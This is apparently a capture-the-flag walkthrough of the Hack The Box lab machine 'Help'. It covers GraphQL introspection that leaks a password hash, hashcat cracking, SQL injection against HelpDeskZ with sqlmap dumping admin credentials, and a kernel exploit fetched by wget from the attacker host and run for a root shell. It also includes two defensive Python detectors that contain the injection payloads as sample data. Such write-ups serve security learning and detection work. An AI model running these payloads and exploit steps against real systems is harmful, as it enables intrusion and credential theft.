Reconnaissance / Scanning
Scan with nmap.
The result of "nmap -p- 10.10.10.121" shows that several ports are open.
Based on that result, run nmap again against the open ports for more detail.
┌──(kali㉿kali)-[~/help]
└─$ sudo nmap -p22,80,3000 -sC -sV -A 10.10.10.121
[sudo] kali のパスワード:
Starting Nmap 7.94SVN ( https://nmap.org )
Nmap scan report for 10.10.10.121
Host is up (0.21s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://help.htb/
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   214.20 ms 10.10.14.1
2   215.11 ms 10.10.10.121
Each port is examined in more detail below.
Investigating TCP/80
Accessing it in a browser showed no page.
dirb finds the following pages.
---- Scanning URL: http://help.htb/ ----
+ http://help.htb/index.html (CODE:200|SIZE:11321)
==> DIRECTORY: http://help.htb/javascript/
+ http://help.htb/server-status (CODE:403|SIZE:296)
==> DIRECTORY: http://help.htb/support/
Accessing /support shows a screen like the following.
Credentials appear to be required.
Investigating TCP/3000
Accessing it shows a screen like the following.
According to the message, credentials can be obtained here.
This page uses GraphQL, and the schema information can be retrieved with the following commands.
┌──(kali㉿kali)-[~/help]
└─$ curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { queryType { name, fields { name, description } } } }" }' | jq -c .
{"data":{"__schema":{"queryType":{"name":"Query","fields":[{"name":"user","description":""}]}}}}

┌──(kali㉿kali)-[~/help]
└─$ curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { types { name } } }" }' | jq -c .
{"data":{"__schema":{"types":[{"name":"Query"},{"name":"User"},{"name":"String"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"Boolean"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__EnumValue"},{"name":"__Directive"},{"name":"__DirectiveLocation"}]}}}

┌──(kali㉿kali)-[~/help]
└─$ curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __type(name: \"User\") { name fields { name } } }" }' | jq .
{
  "data": {
    "__type": {
      "name": "User",
      "fields": [
        {
          "name": "username"
        },
        {
          "name": "password"
        }
      ]
    }
  }
}

┌──(kali㉿kali)-[~/help]
└─$ curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ user { username password } }" }' | jq -c .
{"data":{"user":{"username":"helpme@helpme.com","password":"5d3c93182bb20f07b994a7f617e99cff"}}}

┌──(kali㉿kali)-[~/help]
└─$
For the last command, "User" did not work; the field on the query type is "user" (lowercase), as the first introspection result shows.
The retrieved password appears to be an MD5 hash.
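As an added example (not code from the original walkthrough), a lexical check a gateway or WAF could run on each /graphql request body: it flags the introspection queries shown above (any name with the reserved "__" prefix) and any selection of a sensitive field such as password. The sensitive-field set and the sample bodies are constructed for this example.

```python
import json
import re

# String literals are removed before tokenizing so a quoted value such as "__schema"
# is not mistaken for a field name; identifiers are then collected lexically.
_STRING_LITERAL = re.compile(r'"(?:\\.|[^"\\])*"')
_IDENTIFIER = re.compile(r'[A-Za-z_][A-Za-z0-9_]*')

# Fields an anonymous client should never be able to select. The set is an assumption
# for this example; the walkthrough shows that User.password is exposed.
SENSITIVE_FIELDS = {"password", "token", "secret"}


def inspect_query(body: str) -> dict:
    """Classify one POST body sent to /graphql (a lexical check, not a full GraphQL parse).
    Meta fields such as __schema and __type all carry the reserved "__" prefix."""
    try:
        query = json.loads(body).get("query")
    except (ValueError, AttributeError):
        query = None
    if not isinstance(query, str):
        return {"valid": False, "introspection": False, "sensitive": set()}
    names = set(_IDENTIFIER.findall(_STRING_LITERAL.sub('""', query)))
    return {
        "valid": True,
        "introspection": any(n.startswith("__") for n in names),
        "sensitive": names & SENSITIVE_FIELDS,
    }


def should_block(body: str, allow_introspection: bool = False) -> bool:
    """Gateway decision: reject malformed bodies, reject introspection unless it is
    explicitly enabled (e.g. in development), and reject any sensitive selection."""
    info = inspect_query(body)
    if not info["valid"]:
        return True
    if info["introspection"] and not allow_introspection:
        return True
    return bool(info["sensitive"])


# Constructed copies of the request bodies used above, plus one benign query.
SAMPLES = {
    "schema_fields": '{ "query": "{ __schema { queryType { name, fields { name, description } } } }" }',
    "types": '{ "query": "{ __schema { types { name } } }" }',
    "user_type": '{ "query": "{ __type(name: \\"User\\") { name fields { name } } }" }',
    "credentials": '{ "query": "{ user { username password } }" }',
    "benign": '{ "query": "{ user { username } }" }',
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(f"{label:14} block={should_block(body)!s:5} {inspect_query(body)}")
```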
┌──(kali㉿kali)-[~/help]
└─$ hashid 5d3c93182bb20f07b994a7f617e99cff
Analyzing '5d3c93182bb20f07b994a7f617e99cff'
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x
Crack it with hashcat.
┌──(kali㉿kali)-[~/help]
└─$ hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-penryn-AMD Ryzen 3 3100 4-Core Processor, 3920/7904 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

5d3c93182bb20f07b994a7f617e99cff:godhelpmeplz

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 5d3c93182bb20f07b994a7f617e99cff
Time.Started.....: Thu Jul 25 21:02:20 2024 (11 secs)
Time.Estimated...: Thu Jul 25 21:02:31 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   780.4 kH/s (0.23ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7839744/14344385 (54.65%)
Rejected.........: 0/7839744 (0.00%)
Restore.Point....: 7837696/14344385 (54.64%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: godilu1 -> gocubs2512
Hardware.Mon.#1..: Util: 56%
Gaining Access
Returning to /support and entering the credentials, login succeeded.
HelpDeskZ is an open-source help-desk system and has a SQL injection vulnerability.
Log in and create a ticket with an attachment.
The attachment link of the created ticket looks like the following; the SQLi vulnerability is in the last parameter.
http://10.10.10.121/support/?v=view_tickets&action=ticket&param=4&param=attachment&param=1&param=6
Appending "%20and%201=1--%20-" to the end of the URL confirms the vulnerability: with "1=1" the file downloads, while with "1=2" an error page is displayed.
Use sqlmap to investigate the account information.
Copy the request from Burp into a file.
Output the table information.
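Added example, not from the original post: a small Python scanner that parses web-server access-log lines for the HelpDeskZ attachment URL above and flags parameter values carrying the boolean-based ("and 1=1"/"and 1=2" with a comment terminator) and time-based (SLEEP) blind-injection markers described here. The log lines are constructed and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined access-log format (assumed): client ip, timestamp, request line, status, size.
_LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Markers of the probes used on this box: "and 1=1"/"and 1=2" with a comment
# terminator (boolean-based blind) and SLEEP()/SELECT (time-based blind).
_SQLI_MARKERS = re.compile(
    r"(?i)\b(and|or)\b\s*\(?\s*\d+\s*=\s*\d+|--\s*-|\bsleep\s*\(|\bselect\b"
)


def check_request(target: str) -> dict:
    """Decode one request target and report parameters whose values carry SQLi markers.
    parse_qs keeps repeated keys such as param[] as lists, so every position of the
    HelpDeskZ attachment URL is inspected, not only the last one."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = {k: [v for v in vals if _SQLI_MARKERS.search(v)] for k, vals in params.items()}
    return {"path": parts.path, "hits": {k: v for k, v in hits.items() if v}}


def scan_log(lines):
    """Yield (client ip, status, parameter, decoded value) for each suspicious request."""
    for line in lines:
        m = _LOG_LINE.match(line)
        if not m:
            continue
        for key, values in check_request(m["target"])["hits"].items():
            for value in values:
                yield (m["ip"], int(m["status"]), key, value)


# Constructed sample log lines modelled on the attachment URL from the walkthrough:
# a legitimate download, the two boolean probes, and a sqlmap time-based payload.
SAMPLE_LOG = [
    '10.10.14.3 - - [29/Jul/2024:05:40:01 +0000] "GET /support/?v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6 HTTP/1.1" 200 1523',
    '10.10.14.3 - - [29/Jul/2024:05:40:09 +0000] "GET /support/?v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6%20and%201=1--%20- HTTP/1.1" 200 1523',
    '10.10.14.3 - - [29/Jul/2024:05:40:15 +0000] "GET /support/?v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6%20and%201=2--%20- HTTP/1.1" 200 312',
    '10.10.14.3 - - [29/Jul/2024:05:41:02 +0000] "GET /support/?v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6%20AND%20(SELECT%209605%20FROM%20(SELECT(SLEEP(5)))oNEB) HTTP/1.1" 200 312',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```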
┌──(kali㉿kali)-[~/htb/help]
└─$ sqlmap -r request -p param[] --tables
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.6.3#dev}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[23:00:24] [INFO] parsing HTTP request from 'request'
[23:00:24] [INFO] resuming back-end DBMS 'mysql'
[23:00:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: param[] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6 AND 2767=2767

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6 AND (SELECT 9605 FROM (SELECT(SLEEP(5)))oNEB)
---
(omitted)
Database: support
[19 tables]
+------------------------------------------------------+
| articles                                             |
| attachments                                          |
| canned_response                                      |
| custom_fields                                        |
| departments                                          |
| emails                                               |
| error_log                                            |
| file_types                                           |
| knowledgebase_category                               |
| login_attempt                                        |
| login_log                                            |
| news                                                 |
| pages                                                |
| priority                                             |
| settings                                             |
| staff                                                |
| tickets                                              |
| tickets_messages                                     |
| users                                                |
+------------------------------------------------------+
Next, dump the contents of the "staff" table.
┌──(kali㉿kali)-[~/htb/help]
└─$ sqlmap -r request -p param[] -D support -T staff --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.6.3#dev}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

(omitted)
[20:35:58] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[20:36:03] [INFO] starting dictionary-based cracking (sha1_generic_passwd)
[20:36:03] [INFO] starting 4 processes
[20:36:05] [INFO] cracked password 'Welcome1' for user 'admin'
Database: support
Table: staff
[1 entry]
+----+--------------------+------------+--------+-------+--------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+
| id | email              | login      | avatar | admin | status | fullname      | password                                            | timezone | username | signature                      | department         | last_login | newticket_notification |
+----+--------------------+------------+--------+-------+--------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+
| 1  | support@mysite.com | 1547216217 | NULL   | 1     | Enable | Administrator | d318f44739dced66793b1a603028133a76ae680e (Welcome1) |          | admin    | Best regards,\r\nAdministrator | a:1:{i:0;s:1:"1";} | 1543429746 | 0                      |
+----+--------------------+------------+--------+-------+--------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+

[20:36:16] [INFO] table 'support.staff' dumped to CSV file '/home/kali/.local/share/sqlmap/output/help.htb/dump/support/staff.csv'
[20:36:16] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/help.htb'
The password was obtained above. Logging in over SSH with this information succeeded.
Privilege Escalation
Searching for the Ubuntu kernel version turns up the following exploit.
Fetching the exploit above from Kali onto help and running it gave root.
help@help:~$ wget http://10.10.14.3/44298.c
--2024-07-29 05:42:37--  http://10.10.14.3/44298.c
Connecting to 10.10.14.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5773 (5.6K) [text/x-csrc]
Saving to: ‘44298.c’

44298.c             100%[=================================================================================================================>]   5.64K  8.35KB/s    in 0.7s

2024-07-29 05:42:38 (8.35 KB/s) - ‘44298.c’ saved [5773/5773]

help@help:~$ gcc -o a 44298.c
help@help:~$ ./a
task_struct = ffff88003b953800
uidptr = ffff88003712b544
spawning root shell
root@help:~#